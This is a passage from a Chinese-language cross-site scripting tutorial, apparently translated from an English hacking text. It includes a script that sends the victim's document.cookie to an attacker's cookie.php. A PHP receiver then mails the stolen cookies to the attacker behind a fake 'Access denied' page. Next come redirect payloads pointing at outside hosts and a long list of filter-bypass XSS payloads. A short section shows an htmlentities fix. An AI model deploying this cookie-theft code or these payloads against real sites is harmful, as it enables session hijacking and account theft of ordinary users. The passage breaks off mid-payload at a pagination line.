n/cookie.php?cookies="+document.cookie);
</script>
(www.Hax0r.com = 你的网站)
打开记事本,把下面的代码放进去,另存为cookie.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 TransITional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transITional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</tITle>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>
这对于攻击者还不够,等着还不如接收电子邮件。
修补漏洞:
为修复XSS漏洞使用htmlentITies
在第16行放置
<body>
<span class="alerte">Search result :</span> <strong><?php echo $_POST['VulnerabilITy']; ?></strong>
</body>
By:
<body>
<span class="alerte">Search result :</span> <strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['VulnerabilITy']); } ?></strong>
</body>
use htmlspecialchars() function in PHP
other function:
htmlentITies() quotes
strip_tags()
...
____ ____
要想进行一个XSS攻击是相当简单的事情,这里有些常用的方法:
利用image:
<IMG SRC="/Article/UploadFiles/200805/20080501095810619.png">
利用flash:
<EMBED SRC="http://hax0r.com/Haxored.swf">
重定向:
<script>window.open( "http://lovelaozang.cn/xss.html" )</script>
还有:
<meta http-equiv="refresh" content="0; url=http://lovelaozang.cn/xss.html" />
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 6 - 过滤绕过 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
事实上也不是那么简单就能绕过
htmlspecialchars()
这里有一些关于绕过xss的例子:
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">
window.alert("Xyli !";
"/></a></><img src=1.gif onerror=alert(1)>
[color=red' onmouseover="alert('xss')"]mouse over
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
click me
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<font style='color:expression(alert(document.cookie))'>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
</textarea><script>alert(/xss/)</script>
</tITle><script>alert(/xss/)</script>
<script src=http://yoursITe.com/your_files.js></script>
"><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav
ascr 上一页 [1] [2] [3] [4] 下一页
|
